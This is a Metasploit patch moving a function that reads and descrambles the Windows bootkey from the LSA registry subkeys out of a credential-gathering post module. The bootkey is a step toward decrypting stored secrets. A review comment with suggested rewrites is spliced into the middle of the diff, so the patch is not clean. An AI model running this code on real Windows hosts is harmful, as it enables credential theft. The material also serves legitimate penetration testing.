From 1a85bd22a8f92be08d86df1db00f00b351e44624 Mon Sep 17 00:00:00 2001
From: Rob Fuller
Date: Wed, 16 Oct 2013 22:46:15 -0400
Subject: [PATCH] move capture_boot_key to post win priv
---
 lib/msf/core/post/windows/priv.rb | 25 +++++++++++++++++++
 .../post/windows/gather/credentials/lsa.rb | 21 ----------------
 2 files changed, 25 insertions(+), 21 deletions(-)
diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 22381044f6..689574f20c 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -84,4 +84,29 @@ module Msf::Post::Windows::Priv
 end
 end
 
+ #
+ # Returns the unscrambled bootkey
+ #
+ def capture_boot_key
+ bootkey = ""
+ basekey = "System\\CurrentControlSet\\Control\\Lsa"
+
+ %W{JD Skew1 GBG Data}.each do |k|
+ ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
+ return nil if not ok
+ bootkey << [ok.query_class.to_i(16)].pack("V")
+ ok.close
+ end
+
+ keybytes = bootkey.unpack("C*")
+ descrambled = ""
+ descrambler = [ 0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00, 0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04 ]
+
+ 0.upto(keybytes.length-1) do |x|
+ descrambled << [keybytes[descrambler[x]]].pack("C")
+ end
+
+ return descrambled
+ end
+
 end
diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index 893f7984ba..a807aa3df7 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
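Review bot: In the moved capture_boot_key, `ok.close` is skipped whenever `ok.query_class` raises, so a registry error in the middle of the JD/Skew1/GBG/Data loop leaves that key handle open on the session; wrapping the read in `begin … ensure ok.close end` keeps the handle accounting correct regardless of how the iteration exits. `ok.query_class.to_i(16)` also silently maps a non-hex class string to 0, which produces a wrong bootkey with no error at all; `Integer("0x#{ok.query_class}")` (or a check that the class matches `/\A\h+\z/`) would surface a malformed key instead of propagating a bad value into every decryption built on it. Style-wise, `return nil if not ok` reads better as `return nil unless ok`, `%W` can be `%w` since nothing is interpolated, and the `0.upto` loop collapses to `descrambler.map { |i| keybytes[i] }.pack("C*")`. Since the method now lives in the Priv mixin rather than the lsa.rb post module, confirm `HKEY_LOCAL_MACHINE` and `KEY_READ` still resolve here (qualify them if not), and give callers a contract in the header comment, e.g. `# @return [String, nil] the 16-byte unscrambled bootkey, or nil if any of the four Lsa subkeys could not be opened`.
```ruby
  %w{JD Skew1 GBG Data}.each do |k|
    ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
    return nil unless ok
    begin
      bootkey << [Integer("0x#{ok.query_class}")].pack("V")
    ensure
      ok.close
    end
  end
  # … unchanged: descrambler table …
  descrambled = descrambler.map { |i| keybytes[i] }.pack("C*")
```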
@@ -29,27 +29,6 @@ class Metasploit3 < Msf::Post
 'Author' => ['Rob Bathurst ']
 ))
 end
- def capture_boot_key
- bootkey = ""
- basekey = "System\\CurrentControlSet\\Control\\Lsa"
-
- %W{JD Skew1 GBG Data}.each do |k|
- ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
- return nil if not ok
- bootkey << [ok.query_class.to_i(16)].pack("V")
- ok.close
- end
-
- keybytes = bootkey.unpack("C*")
- descrambled = ""
- descrambler = [ 0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00, 0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04 ]
-
- 0.upto(keybytes.length-1) do |x|
- descrambled << [keybytes[descrambler[x]]].pack("C")
- end
-
- return descrambled
- end
 
 def capture_lsa_key(bootkey)
 begin